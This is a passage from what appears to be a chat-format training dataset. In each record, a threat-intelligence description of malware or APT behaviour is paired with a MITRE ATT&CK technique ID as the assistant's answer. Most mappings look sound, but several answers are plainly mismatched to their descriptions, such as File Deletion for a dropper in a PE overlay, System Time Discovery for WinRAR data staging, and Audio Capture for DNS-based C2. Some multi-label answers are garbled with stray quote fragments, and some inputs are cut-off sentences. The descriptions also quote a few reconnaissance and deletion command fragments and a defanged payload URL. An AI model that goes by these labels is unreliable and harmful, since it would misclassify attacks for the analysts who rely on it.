"content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot collects a list of install programs and services on the system’s machine." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type has used Windows API calls, including `NetUserAdd` and `NetUserDel`." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has obtained and used tools such as Putty, SNScan, and PsExec for its operations." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One for 32-bit and the other for 64-bit, which download an updated version of the loader. The main difference between the two loops is that in case of a Windows x64 infection, there is no check of the loader’s version" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fysbis has the ability to create and execute commands in a remote shell for CLI." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has accessed files to gain valid credentials." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has used MsiExec.exe to automatically execute files." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PsExec has the ability to remotely create accounts on target systems." }, { "role": "assistant", "content": "T1136.002 - Create Account: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The process identifiers or PIDs to be hidden are stored in the shared memory \"Global\\<computer_name>.\" If the shared memory doesn't exist, it takes the PID embedded by the first-stage shellcode. In this case, the intention of the malicious code is to hide Waterbear’s backdoor activities from the security product. Therefore, the first-stage shellcode takes the PID of the Windows Service — which the first-stage shellcode and the succeeding backdoor both inject into — hides the target process, and embeds that PID into the second-stage shellcode" }, { "role": "assistant", "content": "T1055.003 - Thread Execution Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WinMM sets a WH_CBT Windows hook to search for and capture files on the victim." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a keylogger." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has exfiltrated victim information using FTP." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UPPERCUT uses cmd.exe to execute commands on the victim’s machine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions" }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Calisto has the capability to use \"rm -rf\" to remove folders and files from the victim's machine." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UACMe contains many methods for bypassing Windows User Account Control on multiple versions of the operating system." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has used a tool to run `cmd /c wmic computersystem get domain` for discovery." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Analysis of the threat actor’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence" }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Brave Prince variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious has the ability to use Visual Basic scripts for execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper has used SSL to connect to C2 servers." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "txt,log} and is also a \"cryptojacker,\" which is a tool that uses a victim’s computer to mine cryptocurrency" }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging', 'T1557 - Adversary-in-the-Middle" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WMIC is a good tool for managing windows hosts and is widely favored by desktop administrators" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named “readme.png”; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This result is committed to the remote repo under the metafiles directory with a filename denoting the time at which the module was executed. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github" }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ducktail has now replaced the older NET Core information-stealing malware used in previous campaigns with one written in PHP." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer uses a custom port scanner to map out a network." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMatter harvests credentials from Local Security Authority Subsystem Service (LSASS) memory using procmon." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "And, according to the collected config files, the group upgraded their malware communications from plain text http to encrypted https in October 2013" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions" }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "copies itself to disk and creates an associated run key Registry entry to establish." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate can locate files based on hardcoded file extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mythic supports DNS-based C2 profiles." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has a tool that can delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Task 0x1: react_exec The react_exec command appears to execute a payload received from the server. Interestingly it attempts to first execute the payload directly from memory. Specifically it invokes a function named ei_run_memory_hrd which invokes the Apple NSCreateObjectFileImageFromMemory, NSLinkModule, NSLookupSymbolInModule, and NSAddressOfSymbol APIs to load and link the in-memory payload. In some cases the file will be set to executable via a call to chmod. Specifically it instructs the malware to spawn a background thread to execute a function named eilf_rglk_watch_routine. This function creates an event tap (via the CGEventTapCreate API), add it to the current runloop, then invokes the CGEventTapEnable to activate the event tap" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "surveys a system upon check-in to discover the system time by using the net time command." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cadelspy has the ability to capture screenshots and webcam photos." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the command reg query “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\InternetSettings”." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FoggyWeb can allow abuse of a compromised AD FS server's SAML token." }, { "role": "assistant", "content": "T1550 - Use Alternate Authentication Material" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses svchost.exe to execute a malicious DLL included in a new service group." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following commands are supported by the malware: Command ID Description 00 00 00 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe 00 00 01 Deletes the files: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe 00 00 02 Malware exits 00 00 03 Malware downloads the URL that follows the command ID" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM samples have been signed with a code-signing certificates." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute commands remotely by creating a new schedule task on the remote system" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles has used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAMMERTOSS is known to use PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UBoatRAT has used GitHub and a public blog service in Hong Kong for C2 communications." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person" }, { "role": "assistant", "content": "T1087.003 - Email Account', 'T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nebulae can use DLL side-loading to gain execution." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used the Windows service \"winmgmts:\\\\.\\root\\SecurityCenter2\" to check installed antivirus products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike's \"execute-assembly\" command can run a .NET executable within the memory of a sacrificial process by loading the CLR." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil has used encrypted strings and configuration files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nebulae can use CMD to execute a process." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used malware to turn off the \"RequireSigned\" feature which ensures only signed DLLs can be run on Windows." }, { "role": "assistant", "content": "T1553.006 - Subvert Trust Controls: Code Signing Policy Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Confucius has used a file stealer that can examine system drives, including those other than the C drive." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker has a command to take ownership of a file and reset the ACL permissions using the \"takeown.exe /F filepath\" command." }, { "role": "assistant", "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Imminent Monitor has deleted files related to its dynamic debugger feature." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has several modules that search the Windows Registry for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon." }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant of Elise executes \"dir C:\\progra~1\" when initially run." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can drop a mouse-logger that will take small screenshots around at each click and then send back to the server." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server.  It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor’s note: AC is not a  DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain): A AAAA AC – (see note above) CNAME MX TXT SRV SOA The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2" }, { "role": "assistant", "content": "T1123 - Audio Capture', 'T1071 - Application Layer Protocol', 'T1041 - Exfiltration Over C2 Channel', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has utilized PowerShell to download files from the C2 server and run various scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla can inject into known, vulnerable binaries on targeted hosts." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under “Overcoming network segmentation" }, { "role": "assistant", "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT was identified on disk with a filename of \"taskhostsvc.exe\" and it created an encrypted log file at \"C:\\Windows\\Temp\\vmware-vmdmp.log\"." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Writing executables to a randomly-selected directory under Program Files, and naming the EXE to match the chosen directory name, or, if that fails, writing the executable to a system-generated temporary file name, using the EXE extension 3" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Group5 disguised its malicious binaries with several layers of obfuscation, including encrypting the files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\\MICROSOFT\\Windows NT\\ CurrentVersion | ProductName`." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One variant of uses a Microsoft OneDrive account to exchange commands and stolen data with its operators." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We’ve seen the adversary staging data on a remote system or on the local system. Most of the times the data is compressed and copied at the same time. Only a handful of times the adversary copies the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command-line" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture" }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 5 shows the splash image displayed by the Enigma protector prior to executing the malicious payload, which is a wallpaper image available at wallpaperswide.com. The splash screen feature acts as a sandbox evasion technique, as it requires user interaction in the form of 